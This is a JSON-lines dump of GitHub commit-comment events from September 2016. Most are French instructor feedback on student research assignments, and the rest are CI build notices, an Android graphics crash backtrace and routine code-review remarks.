{"id":"4567085746","type":"CommitCommentEvent","actor":{"login":"RomainFrechic"},"repo":{"name":"RomainFrechic/defi-recherche-web"},"payload":{"comment":{"id":19033122,"position":null,"line":null,"path":null,"commit_id":"c946473f8660de09cdda9a789efbc987dfa6ef16","created_at":"2016-09-15T09:46:31Z","updated_at":"2016-09-15T09:46:31Z","body":"ok, je vais modifier tout cela\n\n________________________________\nDe : Maxime <notifications@github.com>\nEnvoyé : jeudi 15 septembre 2016 09:43:39\nÀ : RomainFrechic/defi-recherche-web\nCc : RomainFrechic; Author\nObjet : Re: [RomainFrechic/defi-recherche-web] modif 2 projet dev recherche (c946473)\n\n\nMessage de commit pas adapté et trop flou\n\n-\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/RomainFrechic/defi-recherche-web/commit/c946473f8660de09cdda9a789efbc987dfa6ef16#commitcomment-19033091>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AU_HnIg7xcMQRlo8vl4E4PzYQ178szCKks5qqRNLgaJpZM4J9rYQ>.\n"}},"created_at":"2016-09-15T09:46:31Z"}
{"id":"4567086882","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RomainFrechic/defi-recherche-web"},"payload":{"comment":{"id":19033125,"position":null,"line":null,"path":null,"commit_id":"9bc41a06b1f30934efaf900b1d384e5aad1256c6","created_at":"2016-09-15T09:46:46Z","updated_at":"2016-09-15T09:46:46Z","body":"Copier coller pour le bug ?"}},"created_at":"2016-09-15T09:46:46Z"}
{"id":"4567087278","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"RomainFrechic/defi-recherche-web"},"payload":{"comment":{"id":19033127,"position":null,"line":null,"path":null,"commit_id":"9bc41a06b1f30934efaf900b1d384e5aad1256c6","created_at":"2016-09-15T09:46:50Z","updated_at":"2016-09-15T09:46:50Z","body":"\r\nMessage de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:46:50Z"}
{"id":"4567091168","type":"CommitCommentEvent","actor":{"login":"kamilnowak"},"repo":{"name":"theirc/web.refugee.info"},"payload":{"comment":{"id":19033133,"position":7,"line":405,"path":"simple_ui/static/scss/main.scss","commit_id":"690d65adaf1ee1d589e95f3dfa3290cce6bec025","created_at":"2016-09-15T09:47:40Z","updated_at":"2016-09-15T09:47:40Z","body":"@reyrodrigues typo here"}},"created_at":"2016-09-15T09:47:40Z"}
{"id":"4567093346","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"rachdi/defi-recherche-d-info"},"payload":{"comment":{"id":19033140,"position":null,"line":null,"path":null,"commit_id":"c80b3cb4e7dec8fc46ce064427801987c97efdc3","created_at":"2016-09-15T09:48:08Z","updated_at":"2016-09-15T09:48:08Z","body":"Tu as deux fichiers readme.md et README.md !!! Attention à la casse.\r\nFais le ménage et ne garde que celui qui est utile."}},"created_at":"2016-09-15T09:48:08Z"}
{"id":"4567095389","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"rachdi/defi-recherche-d-info"},"payload":{"comment":{"id":19033143,"position":null,"line":null,"path":null,"commit_id":"c80b3cb4e7dec8fc46ce064427801987c97efdc3","created_at":"2016-09-15T09:48:32Z","updated_at":"2016-09-15T09:48:32Z","body":"Un commit == une réponse. On ne s'y retrouve pas."}},"created_at":"2016-09-15T09:48:32Z"}
{"id":"4567096623","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"rachdi/defi-recherche-d-info"},"payload":{"comment":{"id":19033153,"position":null,"line":null,"path":null,"commit_id":"c80b3cb4e7dec8fc46ce064427801987c97efdc3","created_at":"2016-09-15T09:48:50Z","updated_at":"2016-09-15T09:48:50Z","body":"Pas de sources. Cite les;"}},"created_at":"2016-09-15T09:48:50Z"}
{"id":"4567097966","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033156,"position":null,"line":null,"path":null,"commit_id":"545d9c42626f2ffc599e9df11d1c722110dc7b50","created_at":"2016-09-15T09:49:09Z","updated_at":"2016-09-15T09:49:09Z","body":"**Message de commit pas adapté** et trop flou.\r\n**Un commit == une réponse**. On ne s'y retrouve pas."}},"created_at":"2016-09-15T09:49:09Z"}
{"id":"4567098893","type":"CommitCommentEvent","actor":{"login":"xen0n"},"repo":{"name":"xen0n/android_device_meizu_arale"},"payload":{"comment":{"id":19033158,"position":null,"line":null,"path":null,"commit_id":"6b29c0ddd1ce3efa841365c22d9d63a993180be6","created_at":"2016-09-15T09:49:20Z","updated_at":"2016-09-15T09:49:20Z","body":"@ferhung-mtk Already fixed, now I'm trying *really* hard to get past the hwcomposer crash that prevents me from seeing SystemUI.\r\n\r\n```\r\n09-14 16:52:16.298 18562 18562 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***\r\n09-14 16:52:16.299 18562 18562 F DEBUG   : CM Version: '14.0-20160913-UNOFFICIAL-mx4'\r\n09-14 16:52:16.299 18562 18562 F DEBUG   : Build fingerprint: 'Meizu/cm_mx4/mx4:7.0/NRD90M/5ca1df7c24:userdebug/test-keys'\r\n09-14 16:52:16.299 18562 18562 F DEBUG   : Revision: '0'\r\n09-14 16:52:16.299 18562 18562 F DEBUG   : ABI: 'arm'\r\n09-14 16:52:16.299 18562 18562 F DEBUG   : pid: 17340, tid: 17340, name: surfaceflinger  >>> /system/bin/surfaceflinger <<<\r\n09-14 16:52:16.299 18562 18562 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x2d\r\n09-14 16:52:16.299 18562 18562 F DEBUG   :     r0 00000009  r1 00000001  r2 0000000a  r3 be933208\r\n09-14 16:52:16.299 18562 18562 F DEBUG   :     r4 00000001  r5 be933208  r6 00000001  r7 b69b25c5\r\n09-14 16:52:16.299 18562 18562 F DEBUG   :     r8 be9331f8  r9 00000000  sl b5057a74  fp be9331d8\r\n09-14 16:52:16.299 18562 18562 F DEBUG   :     ip be932c4c  sp be9330a0  lr b5e83c53  pc b69b265a  cpsr 800f0030\r\n09-14 16:52:16.304 18562 18562 F DEBUG   : \r\n09-14 16:52:16.304 18562 18562 F DEBUG   : backtrace:\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #00 pc 0000765a  /system/vendor/lib/hw/gralloc.mt6595.so\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #01 pc 00001c51  /system/lib/libgralloc_extra.so (deleted)\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #02 pc 00010555  /system/lib/hw/hwcomposer.mt6595.so\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #03 pc 000105f7  /system/lib/hw/hwcomposer.mt6595.so\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #04 pc 0001143f  /system/lib/hw/hwcomposer.mt6595.so\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #05 pc 00011ac5  /system/lib/hw/hwcomposer.mt6595.so (_ZN11HWCMediator7prepareEjPP22hwc_display_contents_1+620)\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #06 pc 0001014b  /system/lib/hw/hwcomposer.mt6595.so\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #07 pc 00031f91  /system/lib/libsurfaceflinger.so\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #08 pc 0002a031  /system/lib/libsurfaceflinger.so\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #09 pc 00029695  /system/lib/libsurfaceflinger.so\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #10 pc 00029477  /system/lib/libsurfaceflinger.so\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #11 pc 00011e51  /system/lib/libutils.so (_ZN7android6Looper9pollInnerEi+492)\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #12 pc 00011bd7  /system/lib/libutils.so (_ZN7android6Looper8pollOnceEiPiS1_PPv+26)\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #13 pc 0001edb9  /system/lib/libsurfaceflinger.so\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #14 pc 00029031  /system/lib/libsurfaceflinger.so (_ZN7android14SurfaceFlinger3runEv+10)\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #15 pc 00001085  /system/bin/surfaceflinger\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #16 pc 00016d2d  /system/lib/libc.so (__libc_init+48)\r\n09-14 16:52:16.304 18562 18562 F DEBUG   :     #17 pc 00000e78  /system/bin/surfaceflinger\r\n```\r\n\r\nThe `gralloc_extra` symbol is `android::GraphicBufferExtra::query` from `GraphicBufferExtra_hal.cpp`. It's taking `0x1` as handle value, causing the gralloc HAL to crash. But it's about the only source-built thing in the call stack, surrounded by prebuilt blobs, so I really have no idea how the handler got corrupt."}},"created_at":"2016-09-15T09:49:20Z"}
{"id":"4567099052","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19033159,"position":null,"line":null,"path":null,"commit_id":"23e29e02d1752bcdb8498f58dfdb83895b356385","created_at":"2016-09-15T09:49:22Z","updated_at":"2016-09-15T09:49:22Z","body":"TeamCity test :: test [Build 13](http://ci.lemmew.com:8111/viewLog.html?buildId=1465&buildTypeId=Test_Test) is now running\n"}},"created_at":"2016-09-15T09:49:22Z"}
{"id":"4567099267","type":"CommitCommentEvent","actor":{"login":"tsapa44"},"repo":{"name":"tsapa44/test"},"payload":{"comment":{"id":19033160,"position":null,"line":null,"path":null,"commit_id":"23e29e02d1752bcdb8498f58dfdb83895b356385","created_at":"2016-09-15T09:49:25Z","updated_at":"2016-09-15T09:49:25Z","body":"TeamCity test :: test [Build 13](http://ci.lemmew.com:8111/viewLog.html?buildId=1465&buildTypeId=Test_Test) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:03"}},"created_at":"2016-09-15T09:49:25Z"}
{"id":"4567099352","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"rachdi/defi-recherche-d-info"},"payload":{"comment":{"id":19033161,"position":null,"line":null,"path":null,"commit_id":"c80b3cb4e7dec8fc46ce064427801987c97efdc3","created_at":"2016-09-15T09:49:26Z","updated_at":"2016-09-15T09:49:26Z","body":"Pour le coût : une seule source... C'est trop peu."}},"created_at":"2016-09-15T09:49:26Z"}
{"id":"4567099795","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19033163,"position":null,"line":null,"path":null,"commit_id":"81d6546ce4fab4c4801c6effd9b1a3555519b301","created_at":"2016-09-15T09:49:31Z","updated_at":"2016-09-15T09:49:31Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 28](http://munit-050:8112/tc/viewLog.html?buildId=99041&buildTypeId=BranchesTests_GitYaegorSandbox) is now running\n"}},"created_at":"2016-09-15T09:49:31Z"}
{"id":"4567102085","type":"CommitCommentEvent","actor":{"login":"yulianglukhenko"},"repo":{"name":"infinitered/thesis-phoenix"},"payload":{"comment":{"id":19033167,"position":19,"line":28,"path":"lib/thesis/stores/ecto_store.ex","commit_id":"ef2f32b75a4601d3de0322278a31d7416a200778","created_at":"2016-09-15T09:49:59Z","updated_at":"2016-09-15T09:49:59Z","body":"nvm.. its nil on a the first save.. so in that case we just add another condition"}},"created_at":"2016-09-15T09:49:59Z"}
{"id":"4567102171","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"rachdi/defi-recherche-d-info"},"payload":{"comment":{"id":19033168,"position":null,"line":null,"path":null,"commit_id":"22fe4dc52a697ababea326aaa39d2ffb307f9e0d","created_at":"2016-09-15T09:50:01Z","updated_at":"2016-09-15T09:50:01Z","body":"L'open source n'est pas un programme informatique. C'est un \"mouvement\", voire une philosophie."}},"created_at":"2016-09-15T09:50:01Z"}
{"id":"4567102644","type":"CommitCommentEvent","actor":{"login":"thaomipham"},"repo":{"name":"thaomipham/bluzb"},"payload":{"comment":{"id":19033169,"position":null,"line":null,"path":null,"commit_id":"862bd4b65d8b3d960b354ee92896921a95119418","created_at":"2016-09-15T09:50:08Z","updated_at":"2016-09-15T09:50:08Z","body":"Elsa und Anna von Frozen mit vorprogrammiertem Spiel bewegen"}},"created_at":"2016-09-15T09:50:08Z"}
{"id":"4567103095","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"rachdi/defi-recherche-d-info"},"payload":{"comment":{"id":19033171,"position":null,"line":null,"path":null,"commit_id":"6ed436d5871ffb68dde1ae2f104e2c5fc8e9b157","created_at":"2016-09-15T09:50:14Z","updated_at":"2016-09-15T09:50:14Z","body":"Un commit == une réponse. On ne s'y retrouve pas."}},"created_at":"2016-09-15T09:50:14Z"}
{"id":"4567103886","type":"CommitCommentEvent","actor":{"login":"dennisroczek"},"repo":{"name":"christi3k/mediawiki-bugzilla"},"payload":{"comment":{"id":19033173,"position":null,"line":null,"path":null,"commit_id":"18252b9c89ea362d0072189b87241159ce8c8f40","created_at":"2016-09-15T09:50:22Z","updated_at":"2016-09-15T09:50:22Z","body":"Hi Christie, in which case did this commit fix which issue? (and which mediawiki version do you use(d)?)"}},"created_at":"2016-09-15T09:50:22Z"}
{"id":"4567104591","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"rachdi/defi-recherche-d-info"},"payload":{"comment":{"id":19033175,"position":null,"line":null,"path":null,"commit_id":"6ed436d5871ffb68dde1ae2f104e2c5fc8e9b157","created_at":"2016-09-15T09:50:31Z","updated_at":"2016-09-15T09:50:31Z","body":"Agile manifesto : copier coller ?\r\n"}},"created_at":"2016-09-15T09:50:31Z"}
{"id":"4567105524","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19033177,"position":null,"line":null,"path":null,"commit_id":"557439aa2884c88b3fa24bed1cb49976250c3751","created_at":"2016-09-15T09:50:42Z","updated_at":"2016-09-15T09:50:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1007](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13312&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T09:50:42Z"}
{"id":"4567106113","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"rachdi/defi-recherche-d-info"},"payload":{"comment":{"id":19033179,"position":null,"line":null,"path":null,"commit_id":"6ed436d5871ffb68dde1ae2f104e2c5fc8e9b157","created_at":"2016-09-15T09:50:49Z","updated_at":"2016-09-15T09:50:49Z","body":"On ne parle pas de la même Margaret...."}},"created_at":"2016-09-15T09:50:49Z"}
{"id":"4567106688","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033180,"position":13,"line":20,"path":"README.md","commit_id":"ccffaf033b8953b72d69c7663bc0f404554226d3","created_at":"2016-09-15T09:50:56Z","updated_at":"2016-09-15T09:50:56Z","body":"Supprimer une ligne pour remettre la même ??"}},"created_at":"2016-09-15T09:50:56Z"}
{"id":"4567108224","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"rachdi/defi-recherche-d-info"},"payload":{"comment":{"id":19033182,"position":null,"line":null,"path":null,"commit_id":"6ed436d5871ffb68dde1ae2f104e2c5fc8e9b157","created_at":"2016-09-15T09:51:17Z","updated_at":"2016-09-15T09:51:17Z","body":"Tu n'as pas retrouvé le code, tu as copié collé un extrait de wikipédia. Où est le code source ?"}},"created_at":"2016-09-15T09:51:17Z"}
{"id":"4567109206","type":"CommitCommentEvent","actor":{"login":"mgravell"},"repo":{"name":"StackExchange/Channels.WebSockets"},"payload":{"comment":{"id":19033183,"position":88,"line":156,"path":"src/Channels.WebSockets/WebSocketsProtocol.cs","commit_id":"f6141ed0c8776d36d3f3f633103a5957e54f09b1","created_at":"2016-09-15T09:51:31Z","updated_at":"2016-09-15T09:51:31Z","body":"indeed I can, ta"}},"created_at":"2016-09-15T09:51:31Z"}
{"id":"4567109634","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"rachdi/defi-recherche-d-info"},"payload":{"comment":{"id":19033184,"position":null,"line":null,"path":null,"commit_id":"6ed436d5871ffb68dde1ae2f104e2c5fc8e9b157","created_at":"2016-09-15T09:51:36Z","updated_at":"2016-09-15T09:51:36Z","body":"La source pour la répartition des OS ?"}},"created_at":"2016-09-15T09:51:36Z"}
{"id":"4567115379","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Nomilol/d-fi-recherche-web"},"payload":{"comment":{"id":19033193,"position":null,"line":null,"path":null,"commit_id":"f36e8f2501d6bdc63a2e93f44e1cd2d5fb20868a","created_at":"2016-09-15T09:52:49Z","updated_at":"2016-09-15T09:52:49Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:52:49Z"}
{"id":"4567116565","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033198,"position":19,"line":27,"path":"README.md","commit_id":"ccffaf033b8953b72d69c7663bc0f404554226d3","created_at":"2016-09-15T09:53:05Z","updated_at":"2016-09-15T09:53:05Z","body":"Il semble que tu as utiliser t'es propres mots très bien."}},"created_at":"2016-09-15T09:53:05Z"}
{"id":"4567117136","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Nomilol/d-fi-recherche-web"},"payload":{"comment":{"id":19033200,"position":null,"line":null,"path":null,"commit_id":"25714e5bd6bc20d5d3ab9b5330237da1a2a9425f","created_at":"2016-09-15T09:53:13Z","updated_at":"2016-09-15T09:53:13Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:53:13Z"}
{"id":"4567117502","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Nomilol/d-fi-recherche-web"},"payload":{"comment":{"id":19033202,"position":null,"line":null,"path":null,"commit_id":"25714e5bd6bc20d5d3ab9b5330237da1a2a9425f","created_at":"2016-09-15T09:53:17Z","updated_at":"2016-09-15T09:53:17Z","body":"copié collé ?\r\n"}},"created_at":"2016-09-15T09:53:17Z"}
{"id":"4567117651","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19033203,"position":null,"line":null,"path":null,"commit_id":"402bb47126391571944bcf3209365feac99d54a6","created_at":"2016-09-15T09:53:19Z","updated_at":"2016-09-15T09:53:19Z","body":"@snicolet Thank you! I have updated the branch accordingly."}},"created_at":"2016-09-15T09:53:19Z"}
{"id":"4567120715","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033208,"position":21,"line":29,"path":"README.md","commit_id":"ccffaf033b8953b72d69c7663bc0f404554226d3","created_at":"2016-09-15T09:53:57Z","updated_at":"2016-09-15T09:53:57Z","body":"Citation pour appuyer ce que tu as dit, bien jouer."}},"created_at":"2016-09-15T09:53:57Z"}
{"id":"4567121430","type":"CommitCommentEvent","actor":{"login":"tanwanirahul"},"repo":{"name":"dmlc/xgboost"},"payload":{"comment":{"id":19033209,"position":null,"line":null,"path":null,"commit_id":"fb02797e2ac3ea41f52facb3469926575c4d63cb","created_at":"2016-09-15T09:54:06Z","updated_at":"2016-09-15T09:54:06Z","body":"@CodingCat Thanks for the explanation. I will push the params related change by tomorrow. Also, let me see if I can get it working on Spark 1.6 and maintain the different branch for it.\r\n\r\nBackward incompatible changes - XGBoost.train has been removed and is substituted by trainWithRDD and trainWithDataFrame. We should rather keep the train method as is and add the overloaded method for the DataSet.\r\n\r\n -- if you once tried that you will find scala does not allow to overload methods with default parameters\r\n\r\n>> I didn't notice the default param values there. I would have still liked to keep the train method as is working for RDD and the new method with DataFrame/Dataset. My only aim is to make the changes compatible so that users keep upgrading to the latest changes quite often.\r\n\r\n"}},"created_at":"2016-09-15T09:54:06Z"}
{"id":"4567122335","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19033211,"position":null,"line":null,"path":null,"commit_id":"5c5002d75cc3e3bc5b134b68a6a8304a37d25217","created_at":"2016-09-15T09:54:17Z","updated_at":"2016-09-15T09:54:17Z","body":"Downloaded, testing in progress..."}},"created_at":"2016-09-15T09:54:17Z"}
{"id":"4567123610","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Nomilol/d-fi-recherche-web"},"payload":{"comment":{"id":19033214,"position":null,"line":null,"path":null,"commit_id":"b976474c01127313ee0e5393e6fe4c7e23168584","created_at":"2016-09-15T09:54:34Z","updated_at":"2016-09-15T09:54:34Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:54:34Z"}
{"id":"4567125590","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19033218,"position":null,"line":null,"path":null,"commit_id":"2e8e92f2627915e275c40c3b870e49ff13491c52","created_at":"2016-09-15T09:55:00Z","updated_at":"2016-09-15T09:55:00Z","body":"Or maybe Boot Manager?"}},"created_at":"2016-09-15T09:55:00Z"}
{"id":"4567125975","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033220,"position":null,"line":null,"path":null,"commit_id":"ccffaf033b8953b72d69c7663bc0f404554226d3","created_at":"2016-09-15T09:55:06Z","updated_at":"2016-09-15T09:55:06Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:55:06Z"}
{"id":"4567128456","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"NickoM31/Defi_recherche_web"},"payload":{"comment":{"id":19033222,"position":null,"line":null,"path":null,"commit_id":"7a021f76c9165bd5e4570f53f688e14e0b8aabe3","created_at":"2016-09-15T09:55:35Z","updated_at":"2016-09-15T09:55:35Z","body":"Tu ne dis pas ce qu'est AWS et à quoi cela ça sert"}},"created_at":"2016-09-15T09:55:35Z"}
{"id":"4567128604","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"NickoM31/Defi_recherche_web"},"payload":{"comment":{"id":19033223,"position":null,"line":null,"path":null,"commit_id":"7a021f76c9165bd5e4570f53f688e14e0b8aabe3","created_at":"2016-09-15T09:55:37Z","updated_at":"2016-09-15T09:55:37Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:55:37Z"}
{"id":"4567130187","type":"CommitCommentEvent","actor":{"login":"grawity"},"repo":{"name":"turbo/alwsl"},"payload":{"comment":{"id":19033225,"position":390,"line":390,"path":"alwsl.bat","commit_id":"8e5145490d7d2f7441b61ed9cca6eec5ccf80032","created_at":"2016-09-15T09:55:57Z","updated_at":"2016-09-15T09:55:57Z","body":"how did I not think of this before"}},"created_at":"2016-09-15T09:55:57Z"}
{"id":"4567132583","type":"CommitCommentEvent","actor":{"login":"iBa4x"},"repo":{"name":"iBa4x/VIP1b"},"payload":{"comment":{"id":19033229,"position":null,"line":null,"path":null,"commit_id":"878af6cb2c27ff5def4c54d71706d41bbcdc13d0","created_at":"2016-09-15T09:56:29Z","updated_at":"2016-09-15T09:56:29Z","body":"my twitter : iBa4x\r\n@EnderKenji "}},"created_at":"2016-09-15T09:56:29Z"}
{"id":"4567134437","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033232,"position":17,"line":62,"path":"README.md","commit_id":"3c7ad6b39b8b3f229bb6d850c67f3eae24811e3a","created_at":"2016-09-15T09:56:50Z","updated_at":"2016-09-15T09:56:50Z","body":"Explique ce que c'est ? "}},"created_at":"2016-09-15T09:56:50Z"}
{"id":"4567136552","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"NickoM31/Defi_recherche_web"},"payload":{"comment":{"id":19033236,"position":null,"line":null,"path":null,"commit_id":"3ee5aea7c5bdf1dff11a10052ab60deaf36a0a87","created_at":"2016-09-15T09:57:18Z","updated_at":"2016-09-15T09:57:18Z","body":"KISS en marketing ?? NON, cherche plutot du coté d'Unix."}},"created_at":"2016-09-15T09:57:18Z"}
{"id":"4567138478","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033241,"position":2,"line":47,"path":"README.md","commit_id":"3c7ad6b39b8b3f229bb6d850c67f3eae24811e3a","created_at":"2016-09-15T09:57:41Z","updated_at":"2016-09-15T09:57:41Z","body":"Une seuls source dommage."}},"created_at":"2016-09-15T09:57:41Z"}
{"id":"4567139321","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033243,"position":null,"line":null,"path":null,"commit_id":"3c7ad6b39b8b3f229bb6d850c67f3eae24811e3a","created_at":"2016-09-15T09:57:52Z","updated_at":"2016-09-15T09:57:52Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:57:52Z"}
{"id":"4567140662","type":"CommitCommentEvent","actor":{"login":"aviraxp"},"repo":{"name":"afxefx/InstallerOpt"},"payload":{"comment":{"id":19033246,"position":42,"line":758,"path":"main/java/net/fypm/InstallerOpt/Main.java","commit_id":"17685a3c265b577be324502f658a970bcad2859d","created_at":"2016-09-15T09:58:10Z","updated_at":"2016-09-15T09:58:10Z","body":"Seems that this will cause log flooding in some case......\r\n\r\nUse Log.i instead? Or move to debug log......"}},"created_at":"2016-09-15T09:58:10Z"}
{"id":"4567143911","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Mooncode29/defi_recherche_web"},"payload":{"comment":{"id":19033252,"position":null,"line":null,"path":null,"commit_id":"42757f234932d910dec5c5d1b237a53858ac5bb0","created_at":"2016-09-15T09:58:50Z","updated_at":"2016-09-15T09:58:50Z","body":"Copié collé ?"}},"created_at":"2016-09-15T09:58:50Z"}
{"id":"4567144572","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19033254,"position":29,"line":29,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/servlet/DemoServlet.java","commit_id":"02e15fff7a385f14102793049c5c472aef73a84e","created_at":"2016-09-15T09:58:58Z","updated_at":"2016-09-15T09:58:58Z","body":"What if the URL's query string does not contain `filename=`?"}},"created_at":"2016-09-15T09:58:58Z"}
{"id":"4567145197","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033256,"position":5,"line":81,"path":"README.md","commit_id":"bc25d444b7d4c3f4c186232aa01705ac91063926","created_at":"2016-09-15T09:59:06Z","updated_at":"2016-09-15T09:59:06Z","body":"Pourquoi Amazone ? Et Quand ?"}},"created_at":"2016-09-15T09:59:06Z"}
{"id":"4567145225","type":"CommitCommentEvent","actor":{"login":"MaximePawlakFr"},"repo":{"name":"Mooncode29/defi_recherche_web"},"payload":{"comment":{"id":19033258,"position":null,"line":null,"path":null,"commit_id":"63660b73b6075eb5fe2009f0d869086e7e98e755","created_at":"2016-09-15T09:59:07Z","updated_at":"2016-09-15T09:59:07Z","body":"copié collé ?"}},"created_at":"2016-09-15T09:59:07Z"}
{"id":"4567145293","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19033260,"position":null,"line":null,"path":null,"commit_id":"5c5002d75cc3e3bc5b134b68a6a8304a37d25217","created_at":"2016-09-15T09:59:08Z","updated_at":"2016-09-15T09:59:08Z","body":"Works well, i would add percentage of loading in chat per file loaded, should i add it?"}},"created_at":"2016-09-15T09:59:08Z"}
{"id":"4567145473","type":"CommitCommentEvent","actor":{"login":"AllanCerveaux"},"repo":{"name":"alma31/defi-recherche-web"},"payload":{"comment":{"id":19033262,"position":null,"line":null,"path":null,"commit_id":"bc25d444b7d4c3f4c186232aa01705ac91063926","created_at":"2016-09-15T09:59:10Z","updated_at":"2016-09-15T09:59:10Z","body":"Message de commit pas adapté et trop flou"}},"created_at":"2016-09-15T09:59:10Z"}
{"id":"4567146191","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19033263,"position":null,"line":null,"path":null,"commit_id":"b15856cc9cf160832eb8e4b229a2a877c42b887c","created_at":"2016-09-15T09:59:18Z","updated_at":"2016-09-15T09:59:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1008](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13316&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-15T09:59:18Z"}
{"id":"4567147286","type":"CommitCommentEvent","actor":{"login":"ytest1"},"repo":{"name":"yaegor/sandbox"},"payload":{"comment":{"id":19033264,"position":null,"line":null,"path":null,"commit_id":"81d6546ce4fab4c4801c6effd9b1a3555519b301","created_at":"2016-09-15T09:59:32Z","updated_at":"2016-09-15T09:59:32Z","body":"TeamCity Branches Tests :: Git yaegor sandbox [Build 28](http://munit-050:8112/tc/viewLog.html?buildId=99041&buildTypeId=BranchesTests_GitYaegorSandbox) outcome was **SUCCESS**\nSummary: Running Build time: 0:10:1"}},"created_at":"2016-09-15T09:59:32Z"}
